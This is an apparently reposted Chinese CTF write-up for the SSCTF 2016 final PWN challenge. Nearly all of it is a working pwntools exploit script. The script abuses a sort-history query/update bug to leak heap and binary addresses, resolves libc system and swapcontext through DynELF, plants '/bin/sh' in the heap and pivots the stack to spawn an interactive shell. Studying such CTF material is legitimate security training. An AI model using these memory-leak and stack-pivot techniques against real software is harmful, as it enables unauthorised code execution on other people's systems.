SSCTF Final PWN
2016-06-14 19:07
106 查看
比赛过去了两个月了,抽出时间,将当时的PWN给总结一下。
和线上塞的题的背景一样,只不过洞不一样了。Checksec一样,发现各种防护措施都开了。
View Code
和线上塞的题的背景一样,只不过洞不一样了。Checksec一样,发现各种防护措施都开了。
from pwn import * import time #by wangaohui #context.log_level = 'debug' exe = 'final1' s= remote('127.0.0.1',10001,timeout=60) def getpid(): time.sleep(0.1) pid= pwnlib.util.proc.pidof(exe) print pid raw_input('go!') #getpid() #alloc 12+3 items(align 8 byte,so 12+3+1) s.recvuntil('_CMD_$') s.sendline('sort') s.recvuntil('How many numbers do you want to sort:') s.sendline('12') for i in range(12): s.recvuntil('number:') s.sendline('0') s.recvuntil('Choose: ') s.sendline('7') #sort 3 items(3+3+2) s.recvuntil('_CMD_$') s.sendline('sort') s.recvuntil('How many numbers do you want to sort:') s.sendline('3') s.recvuntil('number:') s.sendline('a') s.recvuntil('Invalid number, stopped input!') s.recvuntil('Choose: ') s.sendline('3') #sort s.recvuntil('Choose: ') s.sendline('') s.recvuntil('Choose: ') s.sendline('1') #query s.recvuntil('Query index: ') s.sendline('3') s.recvuntil('Query result: ') data = s.recvuntil(',')[:-1] #print data if data.startswith('-'): big_chunk = (int(data[1:])^0xffffffff) + 1 - 8 #print hex(big_chunk) else: big_chunk = int(data) -8 #print hex(big_chunk) print 'big_chunk addr is: ' + hex(big_chunk) s.recvuntil('Choose: ') s.sendline('7') #sort 3 items(3+3+2) s.recvuntil('_CMD_$') s.sendline('sort') s.recvuntil('How many numbers do you want to sort:') s.sendline('3') for i in range(3): s.recvuntil('number:') s.sendline('0') s.recvuntil('Choose: ') s.sendline('3') #sort s.recvuntil('Choose: ') s.sendline('') s.recvuntil('Choose: ') s.sendline('7') #reload s.recvuntil('_CMD_$') s.sendline('reload') s.recvuntil('Reload history ID: ') s.sendline('1') s.recvuntil('Choose: ') s.sendline('1') s.recvuntil('Query index: ') s.sendline('6') s.recvuntil('Query result: ') data = s.recvuntil(',')[:-1] #print data if data.startswith('-'): random = ((int(data[1:])^0xffffffff) + 1)^3 #print hex(random) else: random = int(data)^3 #print hex(random) print 'random is: ' + hex(random) s.recvuntil('Choose: ') s.sendline('1') s.recvuntil('Query index: ') s.sendline('7') s.recvuntil('Query result: ') data = s.recvuntil(',')[:-1] #print data if data.startswith('-'): pvt = ((int(data[1:])^0xffffffff) + 1) heap = ((int(data[1:])^0xffffffff) + 1) - 0xa8 #print hex(heap) else: pvt = int(data) heap = int(data) - 0xa8 #print hex(heap) print 'heap addr is: ' + hex(heap) s.recvuntil('Choose: ') s.sendline('2') s.recvuntil('Update index: ') s.sendline('5') s.recvuntil('Update number: ') s.sendline(str(0x7fffffff)) s.recvuntil('Choose: ') s.sendline('2') s.recvuntil('Update index: ') s.sendline('6') s.recvuntil('Update number: ') s.sendline(str(random^0x7fffffff)) s.recvuntil('Choose: ') s.sendline('7') s.recvuntil('_CMD_$') s.sendline('sort') s.recvuntil('How many numbers do you want to sort:') s.sendline('3') for i in range(3): s.recvuntil('number:') s.sendline('0') s.recvuntil('Choose: ') s.sendline('3') #sort s.recvuntil('Choose: ') s.sendline('') s.recvuntil('Choose: ') s.sendline('7') s.recvuntil('_CMD_$') s.sendline('sort') s.recvuntil('How many numbers do you want to sort:') s.sendline('3') s.recvuntil('number:') s.sendline('a') s.recvuntil('Invalid number, stopped input!') s.recvuntil('Choose: ') s.sendline('1') start = (2+16+8+3)*4+big_chunk #items addr if pvt>start: index = (pvt-start)/4 else: index = (pvt+0x100000000-start)/4 s.recvuntil('Query index: ') s.sendline(str(index)) s.recvuntil('Query result: ') data = s.recvuntil(',')[:-1] #print data if data.startswith('-'): vt = ((int(data[1:])^0xffffffff) + 1) else: vt = int(data) if vt>start: index = (vt-start)/4 else: index = (vt+0x100000000-start)/4 s.recvuntil('Choose: ') s.sendline('1') s.recvuntil('Query index: ') s.sendline(str(index)) s.recvuntil('Query result: ') data = s.recvuntil(',')[:-1] if data.startswith('-'): base = ((int(data[1:])^0xffffffff) + 1 - 0x1D50) else: base = int(data - 0x1d50) print 'exe base is: ' + hex(base) def leak(addr): if addr>start: index = (addr-start)/4 else: index = (addr+0x100000000-start)/4 s.recvuntil('Choose: ') s.sendline('1') s.recvuntil('Query index: ') s.sendline(str(index)) s.recvuntil('Query result: ') data = s.recvuntil(',')[:-1] if data.startswith('-'): r = ((int(data[1:])^0xffffffff) + 1) else: r = int(data) return p32(r) d = DynELF(leak,pointer=base,elf=ELF('./final1')) libc_base = d.lookup(None,'libc') print 'libc_base is: ' + hex(libc_base) #method 1 #e=d.libc #str_binsh=(list(e.search('/bin/sh'))[0]) system= d.lookup('system','libc') swapcontext = d.lookup('swapcontext','libc') print 'swapcontext is: ' + hex(swapcontext) pivot = swapcontext+(0x7f-0x10) print 'system is: ' + hex(system) def update(addr,value): if addr>start: index = (addr-start)/4 else: index = (addr+0x100000000-start)/4 s.recvuntil('Choose: ') s.sendline('2') s.recvuntil('Update index: ') s.sendline(str(index)) s.recvuntil('Update number: ') if value>0x7fffffff: s.sendline(str(value-0x100000000)) else: s.sendline(str(value)) redir = big_chunk + (2+16+16)*4 + 0x200 eax = big_chunk + (2+16+16)*4 + 0x300 esp = big_chunk + (2+16+16)*4 + 0x400 #method 2 binsh = 0x6e69622f #/bin binsh1 = 0x68732f #/sh\x00 str_binsh = big_chunk + (2+16+16)*4 + 0x500 update(str_binsh,binsh) update(str_binsh + 4,binsh1) #method 2 end ecx = eax + 0x4c pesp = eax + 0x30 update(redir,pivot) update(pesp,esp) update(esp+4,str_binsh) update(ecx,system) update(start-4,eax) update(eax,redir) s.recvuntil('Choose: ') s.sendline('3') s.interactive() s.close()
View Code
相关文章推荐
- java反射机制
- SSH Access Denied
- 在node.js中,使用基于ORM架构的Sequelize,操作mysql数据库之增删改查
- 第十六周项目2—阅读程序(3)
- 【设计模式】工厂模式
- set集合最经典的编程题型
- C#托管代码调用C++非托管代码
- 刘未鹏逃出肖申克系列链接
- ARM的流水线与PC值的关系
- 分组查询使用的情况
- Restful 操作
- ZF_20160614_计蒜客
- Android——BroadcastReceiver总结
- oracle 监控
- RQNoj 合并果子 优先队列最小堆
- 使用dropkick.js插件实现省市区三级联动效果
- grep、egrep以及正则表达式的使用
- 第12课第3节 字符设备驱动程序之查询方式的按键驱动程序
- java生成UUID通用唯一识别码 (Universally Unique Identifier)
- 宏在C++中的替代解决方案